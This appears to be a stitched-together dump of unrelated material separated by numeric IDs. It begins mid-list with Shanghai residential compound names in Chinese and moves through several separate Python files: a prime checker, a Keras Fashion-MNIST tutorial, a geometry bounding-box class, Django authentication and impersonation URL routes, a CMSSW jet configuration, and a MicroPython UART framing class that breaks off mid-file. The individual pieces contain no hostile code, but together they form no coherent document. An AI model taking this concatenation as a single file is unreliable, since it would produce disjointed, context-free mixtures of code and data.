"三湘花园", "嘉汇广场", "博泰景苑", "紫光苑", "吉祥苑", "绿苑别墅", "中艺花园", "西班牙名园", "海高花苑", "金色港湾", "金上海花园", "樟树缘公寓", "宏凯公寓", "西环公寓", "上海临汾名城", "公园城市", "世纪同乐", "兰侨大厦", "海天花园", "叠翠别墅", "苏堤春晓名苑", "金桥一景", "文宇大楼", "静安花苑", "中通公寓", "外滩鉴赏家", "扬子江大厦", "珊瑚花苑", "桃林公寓", "东方星座", "环球广场", "辛耕大厦", "飞越虹桥", "锦馨苑", "崇明新城明珠花苑", "虹口小城", "隆达公寓", "五矿公寓", "爱莲屋", "嘉和花苑", "万宇漓水花苑", "华东公寓", "新家坡美树馆", "海联花苑", "云间绿大地别墅", "瑞虹新城优贤生活", "华伦公寓", "国威大厦", "宏莲馨苑", "唐山新苑", "茂兴大厦", "海伦新苑", "浦江风景苑", "振新大厦", "莘雅名门", "巴黎时光", "金鹏公寓", "凯虹家园", "贞观艺树林", "恒昌花园", "大华清水湾花园", "复兴南苑", 
"虹口商城", "涵乐园", "新时空国际公寓", "博园小区", "梅福花苑", "怡峰园", "紫丁香花园", "嘉利豪园", "宇泰公寓", "泰德苑", "紫阳花苑", "罗马假期", "乾鸿苑", "清馨苑", "名都新城", "鹤庆花苑", "可乐苑", "虹康家园", "金色黄浦", "绿宸家园", "泰业公寓", "爱中爱华大厦", "安亭新镇", "世晶花苑", "华都公寓", "阳光永业", "金地格林春晓", "西渡", "锦港新村", "广粤路高层", "半岛花园", "佘山宝石别墅", "枫丹白露别墅", "华宝花园", "同济杰座", "同汇苑", "九歌名苑", "花园村雅苑", "荣胜公寓", "金汇", "鸿锦苑", "天合雅园", "金阳怡景公寓", "新外滩花苑", "中闻公寓", "金星苑", "金桥名都", "虹口易家", "虹北公寓", "虹山半岛", "都市山庄", "中山公寓", "华敏翰尊国际", "东郊长岛别墅", "虹桥尊邸", "永怡公寓", "南溪公寓", "帝庭", "艺墅学苑", "虹桥首席", "东苑怡和苑", "虹莘小区", "贤居天下苑", "龙兴苑", "典雅公寓", "文化人家", "裕盛豪园", "生活点睛", "龙腾苑", "虹梅新苑", "西渡鸿吉苑", "珠江新城", "龙缘花园", "龙辰苑", "鹤北新苑", "静安丽舍", "舜龙公寓", "大华阳城花园", "东方都市", "华敏世纪广场", "江南名邸", "枫庭丽苑", "贵都苑", "兴银花园二街坊", "金台苑", "中兴财富国际公寓", "休闲广场", "申江名园", "久业公寓", "新时代花园", "圣得恒业花园", "西郊宝成花苑", "广海花园", "鑫海苑", "锦南公寓", "领秀赏", "兰馨苑", "万峰梦湖苑", "东方异彩", "龙阳花园", "永升大厦", "碧云花园", "虹口现代公寓", "康桥花园", "东园", "丹花苑", "阳光高城苑", "天伦家园", "虹康花苑", "曹杨家园", "中虹翡翠园", "领世馆", "淮海世纪花苑", "黎安人家", "爱法天地", "嘉汇广场", "金桥盈翠庭", "衡园", "金地格林春岸", "静安河滨花园", "春申城四季苑", "仙霞大郡", "兰沁苑", "景星苑", "山水秀", "东苑半岛", "北美之林", "江南山水", "华光紫荆苑", "星辰公寓", "东亚新苑", "威宁花苑", "仙霞紫庭", "金坤花园", "海伦香榭", "海伦都市佳苑", "春申家园", "名人雅居", "沪贵苑", "阳光威尼斯", "仁恒滨江园", "东安大楼", "三鑫花苑", "上海济川国际广场", "嘉美坊", "畅想苑", "明泉公寓", "宏泰公寓", "莱金佳园", "张杨福邸", "华阳苑", "北欧丽景", "东川花园", "雅仕轩", "华景苑", "贝越广兰苑", "宝仪花苑", "梓树园", "日月豪庭", "兴荣家园", "宝安新苑", "淞虹苑", "绿地世家", "虹桥阳光翠庭", "晶采名人大厦", "华山嘉苑", "太原邸", "静安新邸", "康桥南园", "明申花园", "大华阳城", "书院", "罗山绿洲别墅", "绿园四村", "威海苑", "和平南苑", "杰士豪庭", "富都花园", "金兰花苑", "钱江大厦", "虹口玫瑰苑", "海伦公寓", "海富公寓", "九龙锦江大酒店", "绿地世纪花苑", "西郊华庭天下", "静庐懿德公寓", "永盛苑中心站", "西郊庄园", "林梅新村", "徐汇苑", "博泓大厦", "澳马花园", "金海湾别墅", "龙柏金悦公寓", "广兰名苑", "海普苑", "海上花园", "鉴赏新华", "金羽名庭", "景宏嘉园", "陆家嘴新景园", "名都公寓", "虹桥花苑", "华辉绿苑", "写意生活馆", "锦良苑", "文怡花园", "龙臣公寓", "卢湾滨江南园", "龙柏中康公寓", "颐德名苑", "上南绿茵苑", "冠龙家园", "风华水岸", "东兰新城", "海湾世纪佳苑", "世纪阳光园", "静源", "生活艺术居", "新领地", "虹桥绿苑", "盛绿苑别墅", "珠江香樟南园", "绿地科创大厦", "长辉花苑", "徐汇俊园", "荣承公寓", "锦绣华庭", "天秀苑", "滨康大楼", "锦绣人家银杉苑", "康桥水都", "陇福苑", "西郊一品花园", "鸟与花乡", "山水苑", "阳光富比仕", "西部俊园", "银鑫高级公寓", "紫叶花园", "爱法奥朗新庄园", "东渡名人大厦", "上海豪都国际花园", "虹桥光大花园", "虹桥逸品", "绿洲仕格维花园", "南洋新都", "新虹桥明珠花园", "聚星苑", "正旺苑上海奥斯卡", "申贝大厦", "星上海廊侨", "林南花苑", "鲁班公寓", "阳光里阳光翠竹苑", "明日新苑", "东方御花园", "莘都巴洛克", "三琳花园", "徐汇百第宜山大楼", "徐汇37", "绿地世纪花园", "当代艺墅", "绿川新苑", "东上海新城", "安盛花苑", "安盛杉庄", "众众家园", "莱阳生活赏", "东银曲阳花苑", "金汇华光城", "上海春城", "昌里雅苑", "名师华苑", "山泉花苑", "时代花园", "大华颐和华城", "阳光爱琴海", "丽景新苑", "盛大花园", "江南清漪园", "虹桥乐庭", "江桥二村", "世纪苑", "香阁丽苑", "公园世家", "九亭明珠苑", "君临天下花园", "富林四季", "诺丁区", "天山大厦", "同润家园", "申立苑", "溢盈河畔别墅", "亚都国际名园", "新上海弄里人家", "金缘坊", "康虹佳园", "亚都国际名园", "黄兴绿地", "佳泰花园", "华高新苑", "大众河滨", "日安清庭", "国富苑", "锦三角花园", "裕丰大厦", "叠翠别墅", "建中大楼", "玉华苑", "雅仕轩", "盛世家园", "哈佛公寓", "远洋广场", "万邦都市花园", "虹桥华庭", "泗泾颐景园", "勤凯大楼", "乔顿花园", "鑫华俊园", "天宸美景", "心仪雅苑", "天马大厦", "贵龙苑", "华丽家族古北", "复泰华庭", "海鸿公寓", "金龙东苑", "新华御庭", "住友名人苑", "美丽公馆", "圣约瀚名邸", "天山河畔花园", "中星雪野家园", "淞虹公寓", "紫荆苑", "九州家园", "静安桂花园", "爵士静安", "馨庄明珠", "富天苑", "上海人家", "龙珠花苑", "英国会", "银叶苑", "荣鑫公寓", "真情家公园", "真情公寓", "一品新筑", "榆汾新苑", "阳升公寓", "运泰公寓", "上海大公馆", "西部名都花园", "双阳公寓", "新家老家", "白玉苑", "东兰世茗雅苑", "绿茵高地", "开城公寓", "申桂公寓", "盛世年华", "联洋花园", "天合苑", "虹桥公寓", "平利公寓", "明和苑", "绿茵高地", "沧海苑", "棕榈泉花园", "东苑", "万吉花园", "伊东苑", "南康公寓", "共富富都园", "中汇公寓", "东田公寓", "华升花苑", "时代欧洲公寓", "中星羽山公寓", "星惠佳苑", "世纪花苑", "锦福公寓", "弘扬沁园", "汇元坊", "金纺小区", "万科蓝山小城", "明丰世纪苑", "申晨公寓", "和泰花园", "嘉利明珠城", "中虹花园", "新都苑", "虹桥向日葵", "兴联公寓", "和玉苑", "奔腾新干线", "嘉富利大厦", "绿苑公寓", "虹口嘉苑", "栖山苑", "长宁大厦", "豫景公寓", "莫奈印象", "绿地海怡酒店公寓", "天宸美景", "兆丰苑", "申安大厦", "绿地康桥新苑", "康桥老街", "富浩花园", "岚皋馨苑", "紫兰苑", "佳祥公寓", "银都名庭", "龙柏花苑森林海", "艺康苑", "逸香园", "真新六街坊", "天籁", "虹御公寓", "和福花苑", "和亭佳苑", "平易近水", "珊瑚苑", "铭晖西郊苑", "明光公寓", 
"文治福邸", "法式情怀", "中星雅苑", "浦联公寓", "博苑公寓", "阳光美景城", "双泉公寓", "凤城花园", "锦麟天地", "静安康寓", "协和苑", "康桥大厦", "绿洲千岛花园别墅", "新华名苑", "金玉苑", "政通新苑", "正阳世纪星城", "联洋新苑", "盛源大厦", "龙腾公寓", "南方城", "水清木华公寓", "新都花园", "陆家嘴理想家", "翔鹰大楼", "中轩丽苑", "景华世纪园", "上南花苑城", "金玉良园", "兰港大厦", "古北瑞仕花园", "天和苑", "建华公寓", "亨纳斯酒店", "西雅图", "汤臣怡园", "万千公寓", "华鹤楼", "徐汇新城", "阳光前景", "海泰苑", "天山公寓", "锦杨苑", "上海家园", "茶园坊", "欣安大厦", "望春都市家园", "现代苑", "互峰衡园", "荣轩", "凤凰大楼", "凯欣豪园", "旧盘", "御墅花园", "恒森广场", "贵人大厦", "碧云中惠", "金汇花园", "苹果园", "莱克大厦", "徐家汇花园", "华飞潍坊公寓", "新平公寓", "飘鹰花苑", "海上国际花园", "金苹果花园", "金桥花园", "银河世纪经典", "维多利华庭", "锦绿新城", "捷运大厦", "同济绿园", "和风润玉", "和润家园", "黄山新苑", "联谊西康大厦", "乾鸿苑", "银都名墅", "梅福花苑", "福缘", "怡沣大厦", "绿景家苑", "融都金桥园", "世纪名苑", "益民公寓", "五彩星辰", "长航苑", "中福大厦", "金银汇", "日月星辰", "郁金香花苑", "心中家园", "亿豪名邸", "真南新村", "金园坊", "中远两湾城", "晶彩视界", "新塘桥生活广场", "书香名第", "莘远大厦", "圣骊澳门苑", "大同花园管理楼", "汇都大楼", "阳光世家", "元丰天山花园", "平易近水", "秋月枫舍", "万景花园", "川沙公寓", "虹韵家园", "丁香公寓", "显跃世家", "东城时代华庭", "上海第五季", "虹桥丽景苑", "泾阳家园", "盈湖三岛", "安顺公寓", "绿柳苑", "佳慧雅苑", "新都会别墅", "金昌大厦", "盛兴公寓", "维纳阳光", "巴黎时韵", "东安公寓", "建华大厦", "东方康洛", "愚园", "全装修", "毛坯", "九龙花苑", "芝巷公寓", "乾阳佳园", "金铭福邸", "人间怡景", "新福康里", "罗马假日", "梅岭苑", "金色奥斯卡", "金爵别墅", "名典苑", "达安城", "沙田新苑", "河风丽景", "精品", "名典苑", "武宁小城", "玉佛城", "明园小安桥", "康桥半岛", "安居朝阳苑", "吾好佳庭", "上海春天", "海逸公寓", "金水楼台", "建德花园", "玫瑰苑", "清涧家园", "新时代景庭", "欧原", "昕泰苑", "金桥一景", "枫桥苑", "南证大厦", "源梦苑", "梅川二街坊", "真源小区", "上南春天苑", "尚品", "联鑫虹桥苑", "长华公寓", "新贵都曹杨新苑", "江南星城", "纯翠江南", "浦东世纪花园", "燕兴公寓", "怒江苑", "景源佳苑", "塞纳", "左岸", "恒达公寓", "绿洲城市花园", "海悦", "聚金商铺", "大家源新城", "新宏安大厦", "芝川新苑", "徐汇尚座", "上房金丰苑", "陆家嘴花园", "长阳新苑", "象源丽都", "皇朝别墅", "宁泉新苑", "志丹苑", "博佳花园", "峰会", "陆家嘴花园", "万康城", "鑫康苑", "神牛广场商厦", "宁祥公寓", "富贵人家", "内外联公寓", "锦绣家园", "好莱坞花园", "馨华苑", "兰庭", "华浩苑", "莱诗邸", "东方佳年华", "东海园", "蓬莱花苑", "天杰徐汇", "中海馨苑", "静安河滨花园", "兴林公寓", "静安风华苑", "春天花园", "运旺嘉云苑", "交通物资大厦", "凤凰赢家", "虹口小城", "隆达公寓", "东旺雍景苑", "新中苑", "上海新凤城", "静安枫景苑", "展宏大厦", "东方苑", "景和茗苑", "静安枫景", "东方丰甸苑", "新梅广场", "欣欣苑", "当代清水园", "洛川公寓", "银杏家园", "碧绿春舍", "薇阁尊邸", "凤凰家园", "保留房", "市政馨苑", "东方巴黎", "丹芳苑", "新大公寓", "德诚大厦", "瑞德公寓", "新朝时代", "聚龙新苑", "上海浙江商贸城", "淡水公寓", "锦轩新墅", "徐虹华庭", "哈佛印象", "申江世家", "九龙花苑", "佳洲欣苑", "佘山银湖别墅", "胡姬花园", "静安四季公寓", "迎龙大厦", "济阳人家", "华光苑", "长寿苑锦海大厦", "天鼎花园", "佳龙花园", "曲阳豪庭", "紫竹馨苑", "春满园公寓", "建国路一号公馆", "青青白洋淀", "田园", "桐柏公寓", "和泰玫瑰园", "国际明佳城", "朝霞新苑", "豪园", "恒通公寓", "森林湾家园", "锦三角花园", "缘锦园", "杨思水景苑", "申强公寓", "中远龙阳公寓", "中远行家", "太古豪庭", "明华大厦", "六里嘉园", "绿洲紫荆花园", "仕嘉名苑", "学苑风范", "智荟苑", "丽南公寓", "中皇广场", "中皇外滩", "中祥哥德堡", "雅阁花园", "富南大厦", "宏伦大厦", "格力20", "金芙世纪公寓", "永惠大厦", "银欣花苑", "月泉湾名邸", "东兴华苑", "南洋丽景", "南洋苑", "上海虹诚大厦", "迎亭公寓", "锦绣天第", "百花公寓", "爱迪苑", "香缇花园", "诚信大厦", "昌鑫家园", "上海加州花园", "梅福花苑", "惠国公寓", "复星新苑", "金铭新水岸都市", "望隆苑", "中山大楼", "望源公寓", "徐家汇馆", "华唐苑", "汇佳苑", "紫藤苑", "保利星苑", "华融大厦", "欣安基公寓", "日高公寓", "星河世纪城", "星月蓝湾", "怡祥居", "新家坡", "美树馆", "新兴大厦", "龙柏四季花园", "洛可可花园", "幸运坊公寓", "康泰新城", "金和佳园", "玫瑰湾", "丽园公寓", "阳明新城", "静安行家", "万景园", "伊泰利大厦", "祥和名邸", "巴黎风情", "名江七星城", "东方家年华", "天赐苑", "瑞丽公寓市中星", "裕华恒银大厦", "大运盛城", "徐汇公寓", "新上海花园洋房", "新上海里弄人家", "住友公寓", "罗马假日", "香山苑", "黄浦国际", "馥园", "东方名筑"]
11588536
def is_prime(num):
    if num < 2:
        return False
    else:
        # trial division: a composite num must have a factor <= sqrt(num)
        sqrt = int(num ** (1 / 2))
        for i in range(2, sqrt + 1):
            if num % i == 0:
                return False
        return True


p = int(input().strip())
for a0 in range(p):
    n = int(input().strip())
    if is_prime(n):
        print("Prime")
    else:
        print("Not prime")
11588567
from __future__ import absolute_import, division, print_function

import tensorflow as tf
import numpy as np
import matplotlib.pyplot as plot
from tensorflow import keras

fashion_mnist = keras.datasets.fashion_mnist
(train_images, train_labels), (test_images, test_labels) = fashion_mnist.load_data()

class_names = ['T-shirt/top', 'Trouser', 'Pullover', 'Dress', 'Coat',
               'Sandal', 'Shirt', 'Sneaker', 'Bag', 'Ankle boot']

plot.figure()
plot.imshow(train_images[0])
plot.colorbar()
plot.grid(False)
plot.show()

train_images = train_images / 255.0
test_images = test_images / 255.0

plot.figure(figsize=(10, 10))
for i in range(25):
    plot.subplot(5, 5, i + 1)
    plot.xticks([])
    plot.yticks([])
    plot.grid(False)
    plot.imshow(train_images[i], cmap=plot.cm.binary)
    plot.xlabel(class_names[train_labels[i]])
plot.show()

model = keras.Sequential([
    keras.layers.Flatten(input_shape=(28, 28)),
    keras.layers.Dense(128, activation=tf.nn.relu),
    keras.layers.Dense(10, activation=tf.nn.softmax)
])

model.compile(optimizer='adam',
              loss='sparse_categorical_crossentropy',
              metrics=['accuracy'])

model.fit(train_images, train_labels, epochs=100)

test_loss, test_acc = model.evaluate(test_images, test_labels)
print('Test accuracy:', test_acc)

predictions = model.predict(test_images)
print(predictions[0])
print(np.argmax(predictions[0]))
print(test_labels[0])


def plot_image(i, predictions_array, true_label, img):
    predictions_array, true_label, img = predictions_array[i], true_label[i], img[i]
    plot.grid(False)
    plot.xticks([])
    plot.yticks([])
    plot.imshow(img, cmap=plot.cm.binary)
    predicted_label = np.argmax(predictions_array)
    if predicted_label == true_label:
        color = 'blue'
    else:
        color = 'red'
    plot.xlabel("{} {:2.0f}% ({})".format(class_names[predicted_label],
                                          100 * np.max(predictions_array),
                                          class_names[true_label]),
                color=color)


def plot_value_array(i, predictions_array, true_label):
    predictions_array, true_label = predictions_array[i], true_label[i]
    plot.grid(False)
    plot.xticks([])
    plot.yticks([])
    thisplot = plot.bar(range(10), predictions_array, color="#777777")
    plot.ylim([0, 1])
    predicted_label = np.argmax(predictions_array)
    thisplot[predicted_label].set_color('red')
    thisplot[true_label].set_color('blue')


i = 0
plot.figure(figsize=(6, 3))
plot.subplot(1, 2, 1)
plot_image(i, predictions, test_labels, test_images)
plot.subplot(1, 2, 2)
plot_value_array(i, predictions, test_labels)
plot.show()

i = 12
plot.figure(figsize=(6, 3))
plot.subplot(1, 2, 1)
plot_image(i, predictions, test_labels, test_images)
plot.subplot(1, 2, 2)
plot_value_array(i, predictions, test_labels)
plot.show()

# Plot the first X test images, their predicted label, and the true label
# Color correct predictions in blue, incorrect predictions in red
num_rows = 5
num_cols = 3
num_images = num_rows * num_cols
plot.figure(figsize=(2 * 2 * num_cols, 2 * num_rows))
for i in range(num_images):
    plot.subplot(num_rows, 2 * num_cols, 2 * i + 1)
    plot_image(i, predictions, test_labels, test_images)
    plot.subplot(num_rows, 2 * num_cols, 2 * i + 2)
    plot_value_array(i, predictions, test_labels)
plot.show()

# Grab an image from the test dataset
img = test_images[0]
print(img.shape)

# Add the image to a batch where it's the only member.
img = (np.expand_dims(img, 0))
print(img.shape)

predictions_single = model.predict(img)
print(predictions_single)

plot_value_array(0, predictions_single, test_labels)
_ = plot.xticks(range(10), class_names, rotation=45)
plot.show()

print(np.argmax(predictions_single[0]))
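# Optional extension (a sketch, not part of the original walkthrough): persist
# the trained classifier with the standard Keras save/load API so it can be
# reused without retraining. The file name 'fashion_mnist.h5' is an arbitrary choice.
model.save('fashion_mnist.h5')
restored = keras.models.load_model('fashion_mnist.h5')
print('restored test accuracy:', restored.evaluate(test_images, test_labels)[1])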
11588618
from .spatial_func import distance, SPoint


class MBR:
    """Minimal bounding rectangle: an axis-aligned lat/lng box around a set of points."""

    def __init__(self, min_lat, min_lng, max_lat, max_lng):
        self.min_lat = min_lat
        self.min_lng = min_lng
        self.max_lat = max_lat
        self.max_lng = max_lng

    def contains(self, lat, lng):
        # return self.min_lat <= lat <= self.max_lat and self.min_lng <= lng <= self.max_lng
        # The upper bounds are exclusive (half-open box) to stay consistent with the grid index.
        return self.min_lat <= lat < self.max_lat and self.min_lng <= lng < self.max_lng

    def center(self):
        return (self.min_lat + self.max_lat) / 2.0, (self.min_lng + self.max_lng) / 2.0

    def get_h(self):
        return distance(SPoint(self.min_lat, self.min_lng), SPoint(self.max_lat, self.min_lng))

    def get_w(self):
        return distance(SPoint(self.min_lat, self.min_lng), SPoint(self.min_lat, self.max_lng))

    def __str__(self):
        h = self.get_h()
        w = self.get_w()
        return '{}x{}m2'.format(h, w)

    def __eq__(self, other):
        return self.min_lat == other.min_lat and self.min_lng == other.min_lng \
               and self.max_lat == other.max_lat and self.max_lng == other.max_lng

    def to_wkt(self):
        # Five points are provided for GIS visualization: some tools cannot draw
        # a rectangle unless the ring is closed, i.e. the last point repeats the first.
        return 'POLYGON (({} {}, {} {}, {} {}, {} {}, {} {}))'.format(
            self.min_lng, self.min_lat, self.min_lng, self.max_lat,
            self.max_lng, self.max_lat, self.max_lng, self.min_lat,
            self.min_lng, self.min_lat)

    @staticmethod  # staticmethod: this function does not use any instance attribute
    def cal_mbr(coords):
        """
        Find the MBR of a list of coordinates.

        Args:
        -----
        coords: list of SPoint()

        Returns:
        -------
        MBR()
        """
        min_lat = float('inf')
        min_lng = float('inf')
        max_lat = float('-inf')
        max_lng = float('-inf')
        for coord in coords:
            if coord.lat > max_lat:
                max_lat = coord.lat
            if coord.lat < min_lat:
                min_lat = coord.lat
            if coord.lng > max_lng:
                max_lng = coord.lng
            if coord.lng < min_lng:
                min_lng = coord.lng
        return MBR(min_lat, min_lng, max_lat, max_lng)

    @staticmethod
    def load_mbr(file_path):
        with open(file_path, 'r') as f:
            f.readline()  # skip the header line
            attrs = f.readline()[:-1].split(';')
            mbr = MBR(float(attrs[1]), float(attrs[2]), float(attrs[3]), float(attrs[4]))
        return mbr

    @staticmethod
    def store_mbr(mbr, file_path):
        with open(file_path, 'w') as f:
            f.write('name;min_lat;min_lng;max_lat;max_lng;wkt\n')
            f.write('{};{};{};{};{};{}\n'.format(0, mbr.min_lat, mbr.min_lng,
                                                 mbr.max_lat, mbr.max_lng, mbr.to_wkt()))
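# Hedged usage sketch (an addition, not part of the original module): the
# coordinates are illustrative; SPoint(lat, lng) is assumed to expose
# .lat/.lng attributes, which cal_mbr above already relies on.
if __name__ == '__main__':
    pts = [SPoint(31.10, 121.30), SPoint(31.30, 121.50), SPoint(31.20, 121.40)]
    mbr = MBR.cal_mbr(pts)
    print(mbr.center())                 # approx. (31.2, 121.4)
    print(mbr.contains(31.20, 121.40))  # True: strictly inside the half-open box
    print(mbr.to_wkt())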
11588625
from django.conf.urls import url
from django.urls import path

from .views.authentication_views import (
    MayanLoginView, MayanLogoutView, MayanPasswordChangeDoneView,
    MayanPasswordChangeView, MayanPasswordResetCompleteView,
    MayanPasswordResetConfirmView, MayanPasswordResetDoneView,
    MayanPasswordResetView, MultiFactorAuthenticationView,
    UserSetPasswordView
)
from .views.impersonation_views import (
    UserImpersonateEndView, UserImpersonateFormStartView,
    UserImpersonateStartView
)

urlpatterns_authentication = [
    url(
        regex=r'^login/$', name='login_view', view=MayanLoginView.as_view()
    ),
    url(
        regex=r'^login/multi_factor_authentication/$',
        name='multi_factor_authentication_view',
        view=MultiFactorAuthenticationView.as_view()
    ),
    url(
        regex=r'^logout/$', view=MayanLogoutView.as_view(), name='logout_view'
    ),
]

urlpatterns_password = [
    url(
        regex=r'^password/change/done/$', name='password_change_done',
        view=MayanPasswordChangeDoneView.as_view()
    ),
    url(
        regex=r'^password/change/$', name='password_change_view',
        view=MayanPasswordChangeView.as_view()
    ),
    url(
        regex=r'^password/reset/complete/$',
        name='password_reset_complete_view',
        view=MayanPasswordResetCompleteView.as_view()
    ),
    path(
        'password/reset/confirm/<uidb64>/<token>/',
        name='password_reset_confirm_view',
        view=MayanPasswordResetConfirmView.as_view()
    ),
    url(
        regex=r'^password/reset/done/$', name='password_reset_done_view',
        view=MayanPasswordResetDoneView.as_view()
    ),
    url(
        regex=r'^password/reset/$', name='password_reset_view',
        view=MayanPasswordResetView.as_view()
    ),
    url(
        regex=r'^users/(?P<user_id>\d+)/set_password/$',
        name='user_set_password', view=UserSetPasswordView.as_view()
    ),
    url(
        regex=r'^users/multiple/set_password/$',
        name='user_multiple_set_password', view=UserSetPasswordView.as_view()
    )
]

urlpatterns_user_impersonation = [
    url(
        regex=r'^impersonate/end/$', name='user_impersonate_end',
        view=UserImpersonateEndView.as_view()
    ),
    url(
        regex=r'^impersonate/start/$', name='user_impersonate_form_start',
        view=UserImpersonateFormStartView.as_view()
    ),
    url(
        regex=r'^impersonate/(?P<user_id>\d+)/start/$',
        name='user_impersonate_start', view=UserImpersonateStartView.as_view()
    )
]

urlpatterns = []
urlpatterns.extend(urlpatterns_authentication)
urlpatterns.extend(urlpatterns_password)
urlpatterns.extend(urlpatterns_user_impersonation)
11588630
import FWCore.ParameterSet.Config as cms

from PhysicsTools.PatAlgos.recoLayer0.bTagging_cff import *
from PhysicsTools.PatAlgos.recoLayer0.jetTracksCharge_cff import *
from PhysicsTools.PatAlgos.recoLayer0.jetCorrections_cff import *
from PhysicsTools.PatAlgos.mcMatchLayer0.jetMatch_cfi import *
from PhysicsTools.PatAlgos.mcMatchLayer0.jetFlavourId_cff import *
from PhysicsTools.PatAlgos.producersLayer1.jetProducer_cfi import *

## for scheduled mode
makePatJetsTask = cms.Task(
    patJetCorrectionsTask,
    patJetCharge,
    patJetPartonMatch,
    patJetGenJetMatch,
    patJetFlavourIdLegacyTask,
    patJetFlavourIdTask,
    patJets
)

from PhysicsTools.PatAlgos.producersHeavyIons.heavyIonJets_cff import *
_makePatJetsTaskHI = cms.Task(
    recoJetsHIpostAODTask,
    makePatJetsTask.copy()
)
from Configuration.ProcessModifiers.pp_on_AA_cff import pp_on_AA
pp_on_AA.toReplaceWith(makePatJetsTask, _makePatJetsTaskHI)

makePatJets = cms.Sequence(makePatJetsTask)

from RecoBTag.ImpactParameter.pfImpactParameterTagInfos_cfi import *  # pfImpactParameterTagInfos
from RecoBTag.SecondaryVertex.pfSecondaryVertexTagInfos_cfi import *  # pfSecondaryVertexTagInfos
from RecoBTag.SecondaryVertex.pfInclusiveSecondaryVertexFinderTagInfos_cfi import *  # pfInclusiveSecondaryVertexFinderTagInfos
from RecoBTag.Combined.deepFlavour_cff import *  # pfDeepCSVTask

# make a copy to avoid labels and substitution problems
_makePatJetsWithDeepFlavorTask = makePatJetsTask.copy()
_makePatJetsWithDeepFlavorTask.add(
    pfImpactParameterTagInfos,
    pfSecondaryVertexTagInfos,
    pfInclusiveSecondaryVertexFinderTagInfos,
    pfDeepCSVTask
)
from Configuration.Eras.Modifier_run2_miniAOD_80XLegacy_cff import run2_miniAOD_80XLegacy
run2_miniAOD_80XLegacy.toReplaceWith(
    makePatJetsTask, _makePatJetsWithDeepFlavorTask
)
11588656
import ustruct


class UartTrans:
    def __init__(self, uart):
        self.uart = uart
        self.orders = {}
        self.args = {}

    CRC16_TABLE = (
        0x0000, 0xC0C1, 0xC181, 0x0140, 0xC301, 0x03C0, 0x0280, 0xC241,
        0xC601, 0x06C0, 0x0780, 0xC741, 0x0500, 0xC5C1, 0xC481, 0x0440,
        0xCC01, 0x0CC0, 0x0D80, 0xCD41, 0x0F00, 0xCFC1, 0xCE81, 0x0E40,
        0x0A00, 0xCAC1, 0xCB81, 0x0B40, 0xC901, 0x09C0, 0x0880, 0xC841,
        0xD801, 0x18C0, 0x1980, 0xD941, 0x1B00, 0xDBC1, 0xDA81, 0x1A40,
        0x1E00, 0xDEC1, 0xDF81, 0x1F40, 0xDD01, 0x1DC0, 0x1C80, 0xDC41,
        0x1400, 0xD4C1, 0xD581, 0x1540, 0xD701, 0x17C0, 0x1680, 0xD641,
        0xD201, 0x12C0, 0x1380, 0xD341, 0x1100, 0xD1C1, 0xD081, 0x1040,
        0xF001, 0x30C0, 0x3180, 0xF141, 0x3300, 0xF3C1, 0xF281, 0x3240,
        0x3600, 0xF6C1, 0xF781, 0x3740, 0xF501, 0x35C0, 0x3480, 0xF441,
        0x3C00, 0xFCC1, 0xFD81, 0x3D40, 0xFF01, 0x3FC0, 0x3E80, 0xFE41,
        0xFA01, 0x3AC0, 0x3B80, 0xFB41, 0x3900, 0xF9C1, 0xF881, 0x3840,
        0x2800, 0xE8C1, 0xE981, 0x2940, 0xEB01, 0x2BC0, 0x2A80, 0xEA41,
        0xEE01, 0x2EC0, 0x2F80, 0xEF41, 0x2D00, 0xEDC1, 0xEC81, 0x2C40,
        0xE401, 0x24C0, 0x2580, 0xE541, 0x2700, 0xE7C1, 0xE681, 0x2640,
        0x2200, 0xE2C1, 0xE381, 0x2340, 0xE101, 0x21C0, 0x2080, 0xE041,
        0xA001, 0x60C0, 0x6180, 0xA141, 0x6300, 0xA3C1, 0xA281, 0x6240,
        0x6600, 0xA6C1, 0xA781, 0x6740, 0xA501, 0x65C0, 0x6480, 0xA441,
        0x6C00, 0xACC1, 0xAD81, 0x6D40, 0xAF01, 0x6FC0, 0x6E80, 0xAE41,
        0xAA01, 0x6AC0, 0x6B80, 0xAB41, 0x6900, 0xA9C1, 0xA881, 0x6840,
        0x7800, 0xB8C1, 0xB981, 0x7940, 0xBB01, 0x7BC0, 0x7A80, 0xBA41,
        0xBE01, 0x7EC0, 0x7F80, 0xBF41, 0x7D00, 0xBDC1, 0xBC81, 0x7C40,
        0xB401, 0x74C0, 0x7580, 0xB541, 0x7700, 0xB7C1, 0xB681, 0x7640,
        0x7200, 0xB2C1, 0xB381, 0x7340, 0xB101, 0x71C0, 0x7080, 0xB041,
        0x5000, 0x90C1, 0x9181, 0x5140, 0x9301, 0x53C0, 0x5280, 0x9241,
        0x9601, 0x56C0, 0x5780, 0x9741, 0x5500, 0x95C1, 0x9481, 0x5440,
        0x9C01, 0x5CC0, 0x5D80, 0x9D41, 0x5F00, 0x9FC1, 0x9E81, 0x5E40,
        0x5A00, 0x9AC1, 0x9B81, 0x5B40, 0x9901, 0x59C0, 0x5880, 0x9841,
        0x8801, 0x48C0, 0x4980, 0x8941, 0x4B00, 0x8BC1, 0x8A81, 0x4A40,
        0x4E00, 0x8EC1, 0x8F81, 0x4F40, 0x8D01, 0x4DC0, 0x4C80, 0x8C41,
        0x4400, 0x84C1, 0x8581, 0x4540, 0x8701, 0x47C0, 0x4680, 0x8641,
        0x8201, 0x42C0, 0x4380, 0x8341, 0x4100, 0x81C1, 0x8081, 0x4040)

    def crc16(self, data):
        crc = 0xFFFF
        for char in data:
            crc = (crc >> 8) ^ self.CRC16_TABLE[(crc ^ char) & 0xFF]
        crc = ustruct.pack('<H', crc)
        crc = crc[0] << 8 | crc[1]
        return crc

    # brief: register a cmd
    # cmd: string, the cmd name
    # fun: the function that will be executed
    # args: parameters passed to fun
    def reg_cmd(self, cmd, fun, *args):
        hcmd = hash(cmd)
        self.orders[hcmd] = fun
        self.args[hcmd] = args

    # brief: unregister a cmd
    # cmd: string
    def unreg_cmd(self, cmd):
        hcmd = hash(cmd)
        try:
            del self.orders[hcmd]
        except KeyError:
            print("unreg order {} failed".format(cmd))
        try:
            del self.args[hcmd]
        except KeyError:
            pass

    # brief: pack data
    # data: the data to be packed
    # return: packed frame (format: 0xddff(head) is_cmd len data crc16 0xaaff(end))
    def pack_data(self, data, cmd=0):
        head = 0xddff
        end = 0xaaff
        data = bytearray(data)
        crc = self.crc16(data)
        fmt = '>HBH' + str(len(data)) + 'sHH'
        is_cmd = 1 if cmd else 0
        data = ustruct.pack(fmt, head, is_cmd, len(data), data, crc, end)
        return data

    # brief: unpack data
